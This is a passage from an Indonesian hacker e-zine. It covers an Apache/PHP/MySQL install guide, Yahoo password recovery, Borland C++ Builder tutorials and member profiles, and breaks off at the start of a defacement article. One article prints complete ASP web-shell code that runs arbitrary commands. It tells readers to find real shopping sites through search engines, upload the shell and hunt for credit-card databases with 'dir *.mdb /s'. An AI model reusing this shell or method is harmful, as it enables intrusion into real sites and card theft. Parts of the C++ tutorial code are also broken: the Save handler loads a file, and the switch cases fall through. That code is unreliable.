extension ini berisi program- program yang akan dijalankan
bersama PHP dalam hal ini adalah MySQL.
• Save file dan exit program notepad

Instalasi
APACHE
• Jalankan file apache_2.0.55-win32-x86-no_ssl.exe untuk instalasi
program
APACHE
• Klik tombol “Next” pada “Welcome Installation Wizard” screen
• Pilih “I accept the term …” dan klik tombol “Next” pada screen
30
“License
Agreement”
• Klik tombol “Next” pada screen “Read This First”
• Masukan nama “Network Domain”, “Server Name” dan
“Administrator’s
Email …” serta pilih “for All Users ….”

31
“Network Domain” diisi nama domain Anda contohnya
[Link]
“Server Name” diisi nama server Anda contohnya
[Link]
• Klik tombol “Next”
• Pilih “Typical” dan klik tombol “Next” pada screen “Setup Type”
• Klik tombol “Next” pada screen “Destination Folder” untuk
instalasi pada folder C:\Program Files\Apache Group\
• Klik tombol “Install” pada screen “Ready to Install …” untuk
memulai proses instalasi
• Klik tombol “Finish” pada screen “Installation Wizard
Completed”
setelah proses instalasi selesai

Setelah instalasi APACHE ini selesai kita akan mengatur beberapa


konfigurasi pada file [Link] agar web server kita (yaitu
program APACHE) dapat bekerja sama dengan program PHP. Berikut
langkah-langkahnya :

• Pada Windows, tekan tombol “START” pilih “All Programs”,


“Apache HTTP Server 2.0.55”, “Configure Apache Server” dan
“Edit the Apache [Link] ….”
Akan muncul program notepad dengan isi file [Link] yang
akan kita edit
• Tambahkan 3 baris perintah di bawah ini pada akhir file

LoadModule php5_module
c:/php/[Link] AddType application/x-
httpd-php .php .php3 .phtml AddType
application/x-httpd-php-source .phps

• Cari bagian “DirectoryIndex [Link]


[Link]” dan ubah menjadi:

DirectoryIndex [Link] [Link] [Link]


index.php3 [Link]

• Simpan (“Save”) file ini dan exit

Setelah instalasi APACHE pada system tray (lihat bagian pojok kanan
bawah) akan tampak ikon “Apache Service”. Klik dua kali ikon ini
akan tampak windows “Apache Service Monitor”. Tekan tombol
“Restart” untuk restarting apache server dengan konfigurasi baru yang
telah kita lakukan diatas.

32
Jika konfigurasi diatas benar maka lambang Apache2 (seperti gambar
matahari)
akan berwarna hijau dan merah jika konfigurasi file [Link] ada
yang salah.

33
Pada sudut kiri bawah windows “Apache Service Monitor” akan tampak
tulisan
Apache/2.0.55 (Win32) PHP/5.1.2

Ini menunjukan bahwa program apache telah mengenali adanya


program php.

Menguji hasil instalasi


Setelah proses instalasi ketiga program diatas selesai kita kan
menguji hasil
instalasinya apakah semua sudah dapat berjalan dengan
semestinya (dapat saling terkait).

Menguji Apahe & PHP


Ketik perintah di bawah ini dengan notepad :

<html>
<head>
<title>Hari Ini Tanggal :</title>
</
head>
<body>
<p>Hari Ini Tanggal (menurut tanggal Web server ini) :
<?php
echo( date('l, F dS Y.') );
?></
p>
</body>
</html>

Simpan dengan nama file [Link] pada direktori c:\Program


Files\Apache
Group\Apache2\
htdocs.

(Anda dapat menuliskan program lain selain yang penulis contohkan


diatas jika
Anda telah tahu PHP
sebelumnya)

Bukalah program web browser (Internet Explorer, Fire Fox, Opera, dll)
Anda dan ketikan localhost pada input “Address” dan tekan “ENTER”.
Browser akan menampilkan pesan dari program web server (Apache)
yang telah Anda install dan tulisan “Powered by APACHE” pada bagian
bawah. Jika pesan tersebut muncul maka web server Anda telah
34
berjalan.

Sekarang pada “Address” ketiklah localhost/[Link] dan tekan


“ENTER” maka browser akan menampilkan pesan tanggal. Jika pesan
ini muncul maka Apache
& PHP Anda telah berjalan dengan
baik.

Menguji MySQL bersama Apache &


PHP Anda.

35
Pengujian My SQL dapat Anda lakukan melalui command prompt. Pada
command prompt masukan perintah :

mysqladmin –u root –p status

Anda akan ditanyai password root, masukan password root pada


waktu instalasi MySQL diatas. Jika password benar maka akan
ditampilkan keterangan lengkap tentang server MySQL (uptime,
threads, queries, dll).

Informasi ini menyatakan bahwa server MySQL Anda telah


bekerja.

Menurut pengalaman penulis jika sampai langkah terakhir ini semua


berhasil maka system Apache, PHP & MySQL dapat berjalan dengan
baik. Dan Anda sudah dapat akses MySQL dengan PHP & Browser Anda.

Demikian proses instalasi MySQL, PHP & APACHE. Penulis


sangat mengharapkan kritik dan saran Anda. Semoga tulisan
kecil ini dapat membantu Anda.

By
n0n4m3
(n0n4m3@[Link])

36
Lupa sandi email Yahoo anda.

Pepatah bilang kalau manunsia adalah tempatnya khilaf dan salah,


oleh karena itu jadi wajar kalau kita sering lupa. Begitu pula dengan
kata sandi e-mail kita, sering kali kita lupa dengan kata sandi e-mail
kita karena bukan tidak mungkin kita mempunyai e-mail lebih dari
satu dan sandinya berbeda-beda. Disini saya akan memberikan
tutorial untuk mencari kata sandi e-mail kita yang lupa, pada mail
yahoo walaupun pada dasarnya sama pada kebanyakan penyedia
layanan free e-mail.
1. Kita masuk ke halaman yahoo [Link] lalu masuk ke
pilihan
Lupa sandi anda

37
2. Setelah masuk, anda isikan tanggal lahir anda, kode pos, dan
negara asal anda yang sesuai dengan isian anda sewaktu anda
mendaftar layanan e- mail Yahoo.

3. Dibawah nya akan ada Pilihan Apakah anda hanya mencari


kata sandi e- mail saja, atau mencari id e-mail anda.

38
4. Isikan id Yahoo anda pada kolom Lupa sandi Anda? Kalau anda
memilih untuk mendapatkan kata sandi anda kembali

Halaman yang muncul setelah anda klik dapatkan sandi


Baru untuk mengisikan jawaban pertanyaan rahasia anda.
5. Halaman yang muncul setelah anda klik dapatkan sandi Baru
untuk
mengisikan jawaban pertanyaan rahasia anda.

39
6. Isikan jawaban pertanyaan rahasia. Harus sesuai dengan
jawaban anda saat pendaftaran account Yahoo.

Selamat! kata sandi anda telah ditemukan, masuk kembali ke


surat Yahoo anda dengan kata sandi baru, dan ganti dengan
yang mudah anda ingat. Jangan sampai lupa lagi. Begitu
mudahnya bukan kita mencari kata sandi yang lupa sehingga
kita tidak perlu membuat account baru, dan menyebarkan
alamat e-mail baru kita ke teman yang yain. (mas’ud,
wonxcrew@[Link]).

40
Belajar dasar Borland C++ Builder dengan 3
tutor

Sudah 2 tutorial dasar yang penulis tulis tentang tutor pembuatan


program dengan Borland C+ Builder di X-Code Magazine No. 1, saat
artikel tutor ini ditulis, mencari tutor pemograman Borland C++ Builder
dalam bahasa Indonesia di Internet cukup sulit sehingga bagi yang
ingin belajar Borland C++ Builder mungkin cukup sedikit kesulitan
untuk mencari referensinya dalam bahasa Indoensia di internet. Hal ini
merupakan salah satu latar faktor artikel tutor ini dibuat.

Borland C++ Builder adalah pemograman visual menggunakan bahasa


yang sedikit lebih mudah dipahami menurut penulis dibandingkan
penulisan- penulisan bahasa C lainnya, sehingga bagi anda para
programmer Visual Basic atau Delphi yang ingin pindah ke Borland C+
+ Bulder bukanlah hal yang terlalu sulit, apalagi sekarang sudah ada
tool Dephi to C++ Builder yang dapat anda download di
[Link] semakin memudahkan programmer Delphi
menggunakan C++ Builder..

Disini penulis memberikan 3 tutor dasar untuk pembuatan program


yang sederhana yang dapat anda coba, sebagai tambahan bahwa di
Borland C++ Builder karakter sourcenya sangat sensitif seperti huruf
kecil dan besar dibedakan, sehingga dalam membuat program anda
harus lebih teliti.

Selamat
membaca

Membuat program itung-


tungan

Pertama-tama bukalah program Borland C++ Builder anda, setelah itu


pilih File -
> New lalu pilih Application yang ada pada kotak dialog New Items lalu

41
akan tampikan tampilan seperti dibawah ini :

42
Sekarang tinggal ikuti saja table dibawah ini :

Komponen Properti Nilai


Form1 Caption Program itung-itungan
Label1 Caption Nilai X
Label2 Caption Nilai Y
Label3 Caption Hasil Perhitungan
Edit1 Text (Kosongkan)
Edit2 Text (Kosongkan)
Edit3 Text (Kosongkan)
ReadOnly true
Button1 Caption &Tambah
Button2 Caption &Kurang
Button3 Caption &Bagi
Button4 Caption &Kali
Button5 Caption &Reset
Button6 Caption &Exit
TImage Picture (Terserah picturenya
☺)
Kalau udah jadi hasilnya kira-kira seperti dibawah ini :

43
Kalau udah bikin formnya sekarang tinggal bikin sourcenya aja,
gimana caranya
? Ikuti petunjuk dibawah
ini :

Double klik pada Button tambah lalu masukkan


source :

int x = StrToInt (Edit1 -> Text);


int y = StrToInt (Edit2 -> Text);
int hasil = x + y;
Label3 -> Caption = "Hasil X + Y :";
Edit3 -> Text = IntToStr(hasil);

Double klik pada Button Kurang lalu masukkan


source :

int x = StrToInt (Edit1 -> Text);


int y = StrToInt (Edit2 -> Text);
int hasil = x - y;
Label3 -> Caption = "Hasil X - Y :";
Edit3 -> Text = IntToStr(hasil);

Double klik pada Button Bagi lalu masukkan


source :

int x = StrToInt (Edit1 -> Text);


int y = StrToInt (Edit2 -> Text);
int hasil = x / y;
Label3 -> Caption = "Hasil X / Y :";
Edit3 -> Text = IntToStr(hasil);

Double klik pada Button Kali lalu masukkan


source :

int x = StrToInt (Edit1 -> Text);


int y = StrToInt (Edit2 -> Text);
44
int hasil = x * y;
Label3 -> Caption = "Hasil X x Y :";
Edit3 -> Text = IntToStr(hasil);

45
Double klik pada Button Reset lalu masukkan
source :

Edit1 -> Text = " ";


Edit2 -> Text = " ";
Edit3 -> Text = " ";

Double klik pada Button Exit lalu masukkan


source :

Close();

Nah sekarang selesai deh programnya, tinggal disave lalu di Run lalu
kalau mau dicompile, ya compile aja. ☺

Ok sekarang kita lanjut ke tutor dasar selanjutnya yaitu


contoh mengimplementasikan RadioGroup di Borland C++ Builder.

Membuat contoh program dengan


RadioGroups
Setelah kita membuat form baru lalu ikut tabel
dibawah ini :

Komponen Properti Nilai


Form1 Name Form1
Caption Media Yogyafree
RadioGroup1 Name RadioGroup1
Caption Media Yogyafree ..
Items | String List Web Yogyafree ..
Editor Milis Yogyafree ..
Forum
Yogyafree ..
Channel

46
Button1 Name Button1
Caption Tampilkan
Button2 Name Button2

47
Caption Keluar
Label1 Name Label1
Caption Media Yogyafree
Edit1 Name Edit1
Text Dikosongkan

Setelah Selesai tampilannya kira-kira seperti dibawah ini, sebagai


tambahan itemnya ditambahkan alamatnya urlnya jika ingin tampilkan
alamat url juga:

Setelah selesai bikin formnya maka anda tinggal double klik button
Tampilan saja, lalu tulis sourcenya :
switch (RadioGroup1->ItemIndex)
{
case 0 :
{
Edit1->Text =
RadioGroup1->Items->Strings[RadioGroup1->ItemIndex];
}
case 1 :
{
Edit1->Text = RadioGroup1->Items->Strings[RadioGroup1->ItemIndex];
}
case 2 :
{
Edit1->Text = RadioGroup1->Items->Strings[RadioGroup1->ItemIndex];
}
case 3 :
{
Edit1->Text = RadioGroup1->Items->Strings[RadioGroup1->ItemIndex];
}
case 4 :
{
Edit1->Text = RadioGroup1->Items->Strings[RadioGroup1->ItemIndex];
}
}

Setelah itu double klik pada button Keluar lalu masukkan source :

48
Close()

Dengan 2 tutor dasar diatas diharapkan bisa sedikit tahu tentang dasar
pemograman dasar Borlan C++ Builder, sekarang kita akan membuat
program yang lebih fungsional yaitu program Editor seperti Notepad
yang mungkin bisa anda manfaatkan untuk membuat exploit, artikel
dan sebagainya,ya serasa lebih enak bikin source atau artikel dengan
program bikinan kita sendiri dari C programming. ☺

Membuat Program Text Editor dengan memanfaatkan


komponen
RichEdit, MainMenu, SaveDialog dan
OpenDialog.
Sebenarnya program Text Editor berbasis Visual sudah ada sejak
jaman Microsoft mengeluar Microsoft Windows 1.0.x buatan tahun
1985, ya memang dibandingkan dengan Text Editor dari bawaan
Windows-windows saat ini memang jauh lebih maju baik dari segi fitur
dan lainnya.

Disini kita akan mencoba membuat sebuah Text Editor dengan Borland
C++ dengan memanfaatkanmemanfaatkan komponen
RichEdit, MainMenu, SaveDialog dan OpenDialog.

Pertama-tama ikuti spek dari tabel


dibawah ini :

Komponen Properti Nilai


Form1 Name Form1
Caption Editor Text
MainMenu1 Name MainMenu1
RichEdit1 Name RichEdit
Lines 1
(Bisa dikosongkan
atau bisa diisi tulisan
OpenDialog1 Name terserah anda)
OpenDialog1
SaveDialog1 Ma,e SaveDialog1

Jika anda masih bingung apa itu Main Menu, Open Dialog dan Save
Dialog, penulis memberikan gambarnya dibawah ini :

49
Setelah dibuat klik kanan pada MainMenu lalu pilih Menu Designer,
setelah muncul kotak dialog Form1->MainMenu1, lalu isi seperti
dibawah ini :

Nah bikin aja pada Menu File, seperti diatas, disini yang penting
yang diisi adalah Caption dan namenya, ingat name gak boleh sama
satu dengan lainnya.

Tapi jika anda masih bingung mau diisi apa ikuti saja name dan
captionnya seperti dibawah ini :

Name : Baru
Caption : &Baru

Name : Buka
Caption : &Buka

Name : Simpan
Caption : &Simpan

Name : Exit
Caption &Exit

50
Untuk Edit seperti dibawah ini menunya

Untuk lebih baiknya ikuti name dan captionnya dibawah ini jika
anda baru pertama kali membuatnya.

Name : Copy
Caption : &Copy

Name : Paste
Caption : &Paste

Name : Cut
Caption : &Cut

Jika sudah selesai Main Menunya maka kita kembali ke Formnya.

51
Setelah sudah jadi formnya, kita tinggal menulis sourcenya aja,
bagaimana caranya ? ☺

Klik File -> Baru lalu diisi sourcenya :

RichEdit1->Lines->Clear();
RichEdit1->Modified=False;

Klik File -> Buka lalu diisi sourcenya :

if (OpenDialog1->Execute())
RichEdit1->Lines->LoadFromFile(OpenDialog1->FileName);

Klik File -> Simpan lalu diisi sourcenya :

if (SaveDialog1->Execute())
RichEdit1->Lines->LoadFromFile(OpenDialog1->FileName);

Klik File -> Exit lalu diisi sourcenya :

Close()

Klik File -> Copy lalu diisi sourcenya :

RichEdit1->CopyToClipboard();

Klik File -> Paste lalu diisi sourcenya :

RichEdit1->PasteFromClipboard();

52
Klik File -> Cut lalu diisi
sourcenya :

RichEdit1->CutToClipboard();

Setelah selesai menulis sourcenya, save programnya lalui run untuk


mengujinya, hasilnya seperti dibawah ini :

Jika anda ingin mencompilenya maka anda dapat mengcompilenya


menjadi executable, dengan 3 tutor yang telah ditulis penulis
diharapkan dapat membuka sedikit cakrawala pengetahuan anda
tentang pemograman Borland C++ Builder.

Penulis :

Kurniawan /

^family_code^

53
Hack Website Shopping With
[Link]

Thanks to :
Co_BaiN
Author : #kartubeben crew @
DalNet
Website :
[Link]

Hmmm, sebelumnya mungkin penulis harus berterima kasih dulu


kepada kawan penulis Co_BaiN yang telah mengajarkan penulis
tentang hal ini dan kemudian mulai penulis kembangkan sendiri
mengenai teknik ini berdasarkan buku “WEB HACKING” karangan
Stuart McClure ,Saumil Shah dan Shreeraj shah ☺☺☺.

Sebenarnya teknik ini mudah banget lho, gak percaya ??? Bahkan
hampir semudah semudah copy-paste di bug web folder ☺ hanya saya
di sini ada dituntut untuk memahami command-command DOS (no
unix command here !!!) lebih banyak, atau paling tidak sedikitlah.

Hmm... mungkin ada yang harus penulis ingatkan, walau judul artikel
kali ini adalah “HACK WEBSITE SHOPPING WITH [Link]” tetapi
54
menulis tidak ingin membahas bagaimana mencari Credit Card di
sini, karena apa ???

55
Yah, karena penulis sendiri cenderung malas untuk mencari cc sendiri,
mending minta pasteannya aja ama kawan :P~ prêt !!!
Nah, lalu bagaimana langkah selanjutnya ????
Langkah pertama adalah silahkan copy-kan script ASP yang penulis
dapatkan dari site [Link] berikut ini lalu di save dengan nama
terserah anda yang penting ekstensinya adalah asp, sebagai contoh
anda simpan saja script ASP ini dengan nama [Link] :
---------------------=[ cut here the code ]=---------------------
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: [Link]
' Author: Maceo <maceo @ [Link]>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = [Link]("[Link]")
Set oScriptNet = [Link]("[Link]")
Set oFileSys = [Link]("[Link]")
' -- check for a command that we have posted -- '
szCMD = [Link](".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & [Link]( )
Call [Link] ("[Link] /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = [Link] (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= [Link]("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Eksekusi Perintah">

56
</FORM>
<PRE>
<%= "\\" & [Link] & "\" & [Link] %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
[Link] [Link]([Link])
[Link] Call [Link](szTempFile, True)
End If
%>
</BODY>
</HTML>
<-- [Link] -->

---------------------=[ cut here the code


]=---------------------

Huff..., gimana ??? banyak banget ya codenya ??? Kalo pembaca


semua malas buat copy-paste itu text, silahkan
ada mendownloadnya di
[Link]/beben_tools/[Link], hehehehe......
sekalian promosi kecil-kecilan ☺☺☺.

Oh iya hampir lupa, langkah selanjutnya yah ??? hmmm anda bisa
mencari target di google atau di search engine kesayangan anda, terus
masukkan keywords yang kira-kira akan mengarahkan anda ke web
yang memiliki file [Link] (penulis tak sengaja menemukannya
ketika mencoba-coba mencari [Link] kemudia ketika
penulis menghapus nama file [Link] eh
ternyata tuh site bisa di browsing directory, nah kemudian penulis
menemukan file [Link] ini :P~ )

Nah, setelah menemukan file tersebut, sekarang anda bisa


mengupload file kesayangan anda ke target ☺☺☺ dan dalam contoh
kali ini kita akan mengcopy file [Link] yang berisi file-file jahat
57
untuk mengeksekusi comamnd-command di target ☺☺☺ dan
alngkah selanjutnya adalah hak anda tersendiri untuk

58
melakukannya.

Hm... jika anda ingin mencari cc di target, silahkan aja anda ketik
command berikut :
Dir *.mdb /s
Command itu berguna untuk mencari file-file yang berekstensi .mdb di
seluruh pc korban, siapa tau ada beberapa file menarik yang berisi cc
di dalamnya. Lalu untuk men-downloadnya, hehehe... silahkan cari
sendiri caranya, penulis gak mau ikutan dapat dosa kolektif atas
penyalahgunaan cc yang anda dapat tersebut ☺☺☺
Sekian artikel ini penulis buat, semoga ente merimanya dengan
lapang dada. Amienn.......
------------------------------------------------------------
----- Greatz : #kartubeben crew @
[Link]
K-159 and all of #aikmel crew and staff
the_day, y3dips and all of #e-c-h-o crew
and staff kevin yang udah banyak
membantu penulis Nixell yang udah
berbaik hati kenapa penulis
sam_stradlin , PARMIN , CupiD^ , pakcik dan semua yang udah bantu-
bantu di
#kartubeben
Special : bang Co_BaiN yang udah mengajari penulis perhatikan
-----------------------------------------------------------------
#kartubeben
@ [Link]

59
Profile Saben founder
HitamPutihCrew

Nama :
Aang
Asal :
Tegal
IRC Nick : SaBeN ,
IbnuSina
Pekerjaan : Kuliah amburadul gara gara ketagihan
chatting xixixi

Cerita Si Sayah : saya dulu mengenal internet pas taun 2003,itu aja
belum bisa apa² cuman bisa buka web porno sama chattingan di mirc,
xixixi ( bikin email saja belum bisa ), trus bulan oktober sisaya disuruh
sama ortu melayat ke negri orang yang sama sekali belum pernah
ditemui, nah di negri itu sisaya baru mengenal lebih dalam masalah
internet ( soalnya disini murah uy internetnya,
sejam paling sekitar 2000 rupiah, koneksinya juga sip,aw aw aw),
nah pertama kali saya coba itu bikin email diyahoo, ternyata setelah
dicoba tak sesulit yang ada dipikiran saya waktu itu,trus meningkat
lagi, waktu itu saya melihat ada website apa yah lupa, yang penting
pake hosting [Link] nah saya utak atik itu web tripod, dan
mencoba bikin website, ternyata bikin website juga ga sesulit yang ada
dipikiran saya waktu itu, (meskipun websitenya sangat ancur lebur,
kwkwkwk), saya bener² semakin pingin tau lebih dalam lagi masalah
internet, lalu saya mencoba mencari tutorial² lewat google,sampe
akhirnya nemu website [Link] waktu itu, trus saya mencoba
bergabung di channel yogyafree, orangnya baix² hingga sekarang
saya masih aktip di channel yogyafree, hehe, yah sekarang sisaya
kalo disuruh nyari cc atau insya allah deh,xixixi (dasar otak²
perusak,kwkwkwk), dan alhamdulillah berkat dukungan dari crew
yogyafree, sisaya bisa bikin channel sendiri, bukan tujuan nyaingin
tapi mencoba inofasi [Link] udah kebanyakan nih
ceramahnya, xixixi, ya sudah udahan segitu saja ah, cape ngetiknya.

60
Nb : sekedar inpormasi channel sisaya #hitamputihcrew
@[Link]

61
Prophile On
Roninmorgue

== Prophile On

Ronoinmorgue ==

[ Specification ] >>
Handle :
Ronoinmorgue
A.K.A : ANSTELLWINKEL,
KOY^K^GUY^ Handle Origin : EX-
JAPAN SAMURAI
Date of Birth : May 03, On Year
1980
Produce In : Jakarta
Indonesia
Contact : roninmorgue@[Link],
anstellwinkel@[Link]
Height & Weight : 182 Cm
65 Kg
Urlz : Http://[Link],
Htp://[Link]/bloggw/
Computer : AMD Sempron(tm) 2400+, DDR PC2700 512MB, 40 GB
HD, Linux
Slackware/ WinxXP,Win 2003
Server
Project : Write An Exploits, Article, Finding a Wwb
Application Bugs
Hobby : Music, Computer, Science,
Reading.

[ Favorite things ]
>>
Fod : Nasi Padang, Soto
Betawi Drink : Pocary
62
Sweat, Teh Botol Smoke :
No Smoking
Band : All Good Band And I Like Them
Songs
Genre : Rock, Punk, Gothic, Alternative, Pop, Slow Rock, Dangdut
Melayu. Movies : Behind Enemy Lines, Titanic, All War Mivie.
Books : Naruto, All Hacking Book I Know Ezine From
Echo.
I Like : My Parents, My Girls, Computer, Science, Strategic Game, Pizza
(Chesee),
Beff
Steak.
I Dislike :
Arrogancy.

[ Words ]

>>
"Believe Nothing...Trus No One, Expect
YourSelf"

63
[ Hopes ] >>
Better Than
Yesterday

[ Shoutz & Greetz ]


>>
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion,
WaferStick,
newbie,
cloud)
~ all forum|members at [Link]-
[Link]
~ mercubuana-
it@[Link] ,
~ x-code staff n members at yogya_family_code,
^family_code^,
~ n for my sweet heart vivi(ede), maaf kalau sering tidak
memperhatikan kamu (terkalahkan oleh komputer)... terima kasih atas
semua ketulusan yang kau berikan
~ jundiwan atas semua ilmu yang telah
di-share
~ Pak Rusmanto atas bimbingan Linux
Networking-nya

[ Short wOrds about Hacker ]


>> NOT ME

>> [ short
story ]
Pertama saya mengenal komputer pada tahun 1994 sewaktu kelas 2
SMP, dan
disaat itu pulalah saya memiliki komputer saya yang pertama dengan
spesifikasi PC AT 286, masih ber-OS-kan MSDOS x.x.x(lupa). Bersama
teman saya ( jundiwan ) yang tertarik juga dengan
komputer mulai mempelajari programming, waktu itu
saya menggunakan BASIC. Bersama DOS saya sering bermain-main
dengan BAT dan ternyata sangat menyenangkan, sampai dengan
3 SMP saya sudah mulai berkenalan dengan virus komputer yang
sering menjadi
langganan komputer saya, KEYPRESS itulah nama virus yang sering
hinggap dan sayapun mulai mencari tahu bagaimana mengatasi hal
tersebut dan berkenalanlah saya dengan Mcafee Antivirus DOS version
(saya lupa versinya).

Selepas SMP saya kecewa karena tidak berhasil memasuki jurusan


komputer seperti teman saya jundiwan disekolah yang sama (STMN

64
Pembangunan Jakarta)...NEM ngga cukup euy (akhirnya saya dapetnya
malah Bangunan Gedung :( ). Periode inilah masa kelam saya dengan
komputer karena meskipun sudah berganti menjadi AT 386, AT 486
sampai dengan 233 MMX tidak pernah saya gunakan melainkan hanya
bermain game (dari versi DOS sampai Windows saya ada tuh :)) dan
menggambar dengan AutoCAD (maklum Bangunan Gedung sih n
kerja diperusahaan konstruksi).

Tahun 2001, itulah awal saya kembali kepada dunia yang telah
dirindukan selama ini... IT man cos saya kuliah lagi dibidang yang saya
minati (walaupun sebenarnya ngga perlu kuliah juga sih :)), but anyway
saya mengganti komputer saya dengan AMD Duron 850 MHz...inilah
kali pertama saya mulai tertarik

65
dengan AMD cos lebih murah sih. Penggantian ini disebabkan MOBO
saya tersambar petir sewaktu OL dengan telkomnet instan :(.
Walaupun saya merasa terlambat cos teman saya jundiwan sudah jauh
melewati saya dalam dunia komputernya n dia sudah dapat membuat
virus yang menyerang BIOS serta melakukan hacking terhadap situs-
situs xxx...Ah jadi tambah kecewa saya but saya yakin pasti bisa
mengejar atawa minimal menyamai lah :)

Praktis selama dikampus kegiatan saya ngga jauh dari programming n


networking, saya mempelajari bahasa-bahasa pemrograman seperti
Pascal, VB6, Delphi, Web Programming(PHP + JavaScript + HTML), Perl,
C++. Tapi akhirnya saya lebih tertarik dengan Perl, Web
Programming(PHP), C++ n lagi belajar
.NET Aktif di Hima TI pada divisi Riset dan Teknologi pada tahun
2003/2004, Mulai mempelajari Linux sewaktu semester 4 (sebenarnya
dari kelas 3 STM saya sudah tahu linux distro Redhat), nekat install
linux dikomputer saya dengan konsentrasi tinggi (halaah padahal
cuma pake mandrake doang :)) n langung mempelajari shell dilinux
(bash shell)...karena saya sudah familiar dengan DOS kayanya ngga
terlalu sulit deh n lanjut ke shell programming-nya.

Selain programming saya juga ternyata memiliki ketertarikan


dengan networking, akhirnya saya mulai mencari tahu tentang
jaringan menggunakan linux...searching with google adalah kegiatan
tanpa henti yang saya lakukan demi untuk mencari tahu tentang
networking (asli.. dari kampus paling cuma
10%) sampai-sampai sering dikomplain mama yang harus bayar
tagihan telpon gila-gilaan (mama... maafkan saya yah!!), bergabung
dengan milis adalah salah satu kegiatan yang terus saya
lakukan...huehuehue sampai email saya banyak banget, ikut
seminar-seminar. Dari situlah saya mulai bisa berjaringan ria
menggunakanlinux(RedHat n Slacky), membuat gateway, router, DNS
Server(BindDNS), MailServer(PostFix) n penggunaan IP tables,
Proxy(Squid). Dimanakah saya mempraktekan itu semua???
jawabannya adalah 10% lab kampus n 90% VMware yang
terinstall dikomputer saya yang telah berubah menjadi AMD
Sempron(tm) 2400+, thanx to VMWare Developer!!!

Mulai tertarik dengan dunia hacking saat dapet MKul Sistem Keamanan
Komputer, melihat situs jasakom, echo dan lebih tertarik lagi saat tahu
ada komunitas yogyafamilycode at [Link] (itu url yang
saya tahu pertama kali hasil dari google) pada akhir2 tahun 2004,
sempat nunggu lama untuk bergabung jadi members karena setau
saya syarat jadi members adalah menulis komentar dibuku tamu dan
mengirim email..tapi ngga pernah ada konfirmasi balik :( sampai
akhirnya saya berhasil chatting dengan family_code di

66
#yogyafree dengan nickname koyakaguya (masih inget ngga
mas... kayanya lupa deh :))dan dikonfirmasi bahwa untuk jadi member
cukup join dimilis saja (oh berarti saya dah jadi members dong :))

67
Member pasif itulah julukan yang pantas buat saya karena
hanya sekedar mencari artikel, DL tools, n crawling situs yogyafree
(setau saya waktu itu belom ada mirrornya) tanpa terlalu aktif dimilis
sampai akhirnya yogyafree sulit untuk diakses dan sayapun cukup
lama hilang kontak dengan situs ini. Akhirnya saya coba untuk
melihat kembali komunitas ini dan ternyata sudah
sangat berbeda...lengkap dengan forum, friendster dan
sebagainya deh (kagum gw).

Tahun 2006 saya dan teman-teman kampus saya berhasil


membentuk [Link], setelah lama
tertunda karena kendala antar
mahasiswanya...sempat berpikir bisa ngga yah eksis, tapi maju terus
pantang mundur adalah moto kami walhasil sampe sekarang tetap
eksis dengan jumlah member yang cukup
menggembirakan. Mengetahui bahwa x-code
telah membuat x-code magazine 1, saya mencoba membuat artikel
untuk x-magazine
2 dan ternyata layak tayang...saya semakinmantap
bergabung dengan komunitas ini (cos banyak ilmu yang saya
dapatkan) dan satu hal yang saya sukai dan setuju dengan
komunitas ini adalah bahwa kita saling belajar tanpa memandang
status dikomunitas (good job bro...^family_code^)...terus maju
walaupun banyak yang tidak suka karena lebih banyak yang suka
terhadap kita.

Sekarang saya sedang tahap Skripsi dengan melakukan


pengembangan enkripsi terhadap algoritma blowfish untuk diterapkan
pada database, sesuai dengan pekerjaan saya sekarang sebagai
Database Administrator di MCC. Mohon doanya dari semua!!!

Alhamdulillah atas semua karunia yang telah ALLAH SWT berikan

untuk saya. EOF.


DEDICATED FOR MY INSPIRATION VIVILIA PERTIWI

(C)opyleft 30 Juni
2006

/ _ \/ \| \ | | / \| |
/ /_) \ _ \ \| | | \| |
/ / (_) | | | |
/ | \ / |\ | | |\ |
/ | \ /| |\ | \ |\ |

[Link]

68
Profil Mbak Nita Si programmer
(PushM0v)

Sebenarnya ada beberapa cewek yang aktif di komunitas


Yogyafree seperti Kudel, Mbak Nita, Mbak Desy (distributor) dan
sebagainya seperti hampir semua distributor CD Yogyafree
sebelumnya juga adalah adalah cewek, salah satunya dikatakan
mempunyai kemampuan lebih dibidang programming dan hacking
adalah Mbak Nita dengan nicknya Cew_Asikk, mbak yang hobby
programming ini kuliah disalah satu perguruan tinggi swasta di
Jakarta, mungkin banyak yang tidak asing dengan cewek yang satu ini
yang sering dikenal dengan PushM0v, ya dia salah satu penulis artikel
untuk X-Code magazine nomor perdana, Redaksi sengaja
meminta Mbak Nita untuk mengirimkan sebuah
AntiVirus buatannya yang original
yang bernamaMultiKiller2 untuk dibagi dengan komunitas,
bagi yang ingin mendownload dapat
mendownloadnya di
[Link] Berikut ini
sedikit review si programmer yang sengaja redaksi request juga selain
program AVnya untuk para pembaca X-Code Magazine.

About Mbak Nita / Cew_Asikk /


PushM0v

Kenal Komputer sejak TK, waktu itu pernah dapet juara 2 lomba
Komputer. Trus ampe SD masih main komputer, tapi pas SMP
komputer dah gak pegang lagi karena rusak T_T.

Nah pas masuk kuliah baru beli komputer lagi


dengan spek :
P4 2.8c, INtel 865PERL, RAM 1 GB, Seagate 80 GB
SATA n
DVD RAM/RW.

Pas lulus SMA sempat ikut kursus Junior Programming n Database


selama 6 bulan. Bahasa pemograman pertama kali yg dipelajarin
69
PASCAL pas SMA. Bhs yg paling sering dipake yaitu C, C++, VB 6.0 dan
Java.

Bidang IT yang disukai : -


Programming

70
- Networking
- Operating System Development

Penulis : Mbak Nita / Cew_Asikk / PushM0v

71
Deface with PHP
Bugs

Assalamu’alaikum all, pa
khabare ???
Penulis doain ente-ente semua semoga dalam lindungan Allah SWT
dan selalu sehat juga selalu semangat selalu yah.

Kali ini penulis ingin membahas tentang bug yang udah lama, soalnya
penulis pribadi paling jarang baca-baca tentang bug baru, dan paling
malas ngikutin perkembangan zaman, wekekekeke... ☺ makanye
